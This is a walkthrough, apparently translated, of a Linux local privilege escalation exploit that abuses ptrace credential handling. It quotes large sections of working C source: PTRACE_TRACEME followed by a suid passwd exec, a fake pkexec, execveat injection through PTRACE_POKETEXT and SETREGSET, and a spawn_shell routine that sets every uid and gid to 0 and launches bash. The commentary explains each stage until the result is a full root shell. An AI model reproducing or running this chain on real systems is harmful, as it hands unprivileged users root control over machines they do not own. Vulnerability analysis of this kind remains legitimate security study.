 91     SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
 92 
 93     /*
 94      * now we execute passwd. because the ptrace relationship is considered to
 95      * be privileged, this is a proper suid execution despite the attached
 96      * tracer, not a degraded one.
 97      * at the end of execve(), this process receives a SIGTRAP from ptrace.
 98      */
 99     puts("executing passwd");
100     execl("/usr/bin/passwd", "passwd", NULL);
101     err(1, "execl passwd");
102   }
103 
104   SAFE(dup2(self_fd, 0));
105   SAFE(dup2(block_pipe[1], 1));
106 
107   struct passwd *pw = getpwuid(getuid());
108   if (pw == NULL) err(1, "getpwuid");
109 
110   middle_success = 1;
111   execl("/tmp/fakepkexec", "fakepkexec", "--user", pw->pw_name, NULL);
112   middle_success = 0;
113   err(1, "execl pkexec");
114 }

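Line 70 calls fork to create the grandchild process (task C).

Then at line 111, task B runs fakepkexec, which raises and then drops its privileges.

Now look at lines 76 ~ 84: once task C detects that task B's euid has become 0, it executes line 91, PTRACE_TRACEME, to capture a root ptracer_cred. Immediately afterwards task C calls execl on a suid binary so that its own euid becomes 0.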
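The polling loop works because the "Uid:" line of /proc/<pid>/status lists the real, effective, saved and filesystem uids separated by tabs. A minimal sketch of that matching step, using a hypothetical helper `status_shows_root_euid` that operates on an already-read buffer instead of the exploit's `tprintf`/`pread` loop:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>  /* uid_t */

/*
 * Returns true when a /proc/<pid>/status snapshot shows a process whose
 * real uid is `ruid` and whose effective uid is 0.
 */
static bool status_shows_root_euid(const char *status, uid_t ruid)
{
    char needle[64];

    assert(status != NULL);
    /* Same pattern as the exploit: newline, "Uid:", real uid, then euid 0. */
    snprintf(needle, sizeof(needle), "\nUid:\t%u\t0\t", (unsigned int)ruid);
    return strstr(status, needle) != NULL;
}
```

The leading newline in the pattern anchors the match to the start of the "Uid:" line, and the trailing tab keeps an euid such as 0 from matching a longer number.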

190   /*
191    * wait for our child to go through both execve() calls (first pkexec, then
192    * the executable permitted by polkit policy).
193    */
194   while (1) {
195     int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
196     char buf[16];
197     int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
198     buf[buflen] = '\0';
199     *strchrnul(buf, '\n') = '\0';
200     if (strncmp(buf, basename(helper_path), 15) == 0)
201       break;
202     usleep(100000);
203   }
204 
205   /*
206    * our child should have gone through both the privileged execve() and the
207    * following execve() here
208    */
209   SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
210   SAFE(waitpid(midpid, &dummy_status, 0));
211   fputs("attached to midpid\n", stderr);
212 
213   force_exec_and_wait(midpid, 0, "stage2");
214   return 0;

Back in task A's main function, lines 194 ~ 202: once task A detects that task B's comm has become that of the helper, it attaches to B (line 209) and then

runs line 213, which calls force_exec_and_wait.

116 static void force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
117   struct user_regs_struct regs;
118   struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
119   SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
120   SAFE(waitpid(pid, &dummy_status, 0));
121   SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
122 
123   /* set up indirect arguments */
124   unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
125   struct injected_page {
126     unsigned long argv[2];
127     unsigned long envv[1];
128     char arg0[8];
129     char path[1];
130   } ipage = {
131     .argv = { scratch_area + offsetof(struct injected_page, arg0) }
132   };
133   strcpy(ipage.arg0, arg0);
134   for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
135     unsigned long pdata = ((unsigned long *)&ipage)[i];
136     SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
137                 (void*)pdata));
138   }
139 
140   /* execveat(exec_fd, path, argv, envv, flags) */
141   regs.orig_rax = __NR_execveat;
142   regs.rdi = exec_fd;
143   regs.rsi = scratch_area + offsetof(struct injected_page, path);
144   regs.rdx = scratch_area + offsetof(struct injected_page, argv);
145   regs.r10 = scratch_area + offsetof(struct injected_page, envv);
146   regs.r8 = AT_EMPTY_PATH;
147 
148   SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
149   SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
150   SAFE(waitpid(pid, &dummy_status, 0));
151 }

force_exec_and_wait uses ptrace to make the tracee call execveat and replace its process image. Here it makes task B execute task A's program (the exploit executable itself) with argv[0] set to stage2, which in effect makes task B run middle_stage2.
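The address arithmetic in force_exec_and_wait is easier to follow in isolation. The sketch below reuses the exploit's `struct injected_page` layout; `scratch_area_for` and `tracee_addr` are hypothetical helper names introduced only to show how the pointers written into the tracee's registers are derived.

```c
#include <assert.h>
#include <stddef.h>

/* Same layout as the exploit's struct injected_page. */
struct injected_page {
    unsigned long argv[2];  /* argv[0] points at arg0, argv[1] stays NULL */
    unsigned long envv[1];  /* empty environment: envv[0] stays NULL */
    char arg0[8];           /* "stage2" or "stage3" */
    char path[1];           /* empty path, used together with AT_EMPTY_PATH */
};

/* Page-aligned scratch address at least one page below the stack pointer. */
static unsigned long scratch_area_for(unsigned long rsp)
{
    return (rsp - 0x1000) & ~0xfffUL;
}

/* Address, inside the tracee, of the field at `field_offset` in the page. */
static unsigned long tracee_addr(unsigned long scratch_area,
                                 size_t field_offset)
{
    assert(field_offset < sizeof(struct injected_page));
    return scratch_area + field_offset;
}
```

For example, `tracee_addr(scratch, offsetof(struct injected_page, path))` is the value the exploit places in `rsi`, and the `offsetof` of `argv` and `envv` give the values for `rdx` and `r10`. On x86-64 the structure is padded to 40 bytes, so the PTRACE_POKETEXT loop writes five words.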

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();

middle_stage2 in turn calls force_exec_and_wait, so task B uses ptrace to make task C call execveat, replacing task C's image with the exploit binary as well, this time with argv[0] set to stage3.

153 static int middle_stage2(void) {
154   /* our child is hanging in signal delivery from execve()'s SIGTRAP */
155   pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
156   force_exec_and_wait(child, 42, "stage3");
157   return 0;
158 }

When the exploit binary runs with argv[0] equal to stage3, it actually runs spawn_shell, so in its final stage task C runs spawn_shell.

160 static int spawn_shell(void) {
161   SAFE(setresgid(0, 0, 0));
162   SAFE(setresuid(0, 0, 0));
163   execlp("bash", "bash", NULL);
164   err(1, "execlp");
165 }

In spawn_shell, setresgid/setresuid first set the process's real, effective and saved uid/gid to root. Since task C has already executed a suid binary and has euid root, these setresuid/setresgid calls succeed, and task C is now a full root process. Finally execlp starts a shell, which gives a shell with full root privileges.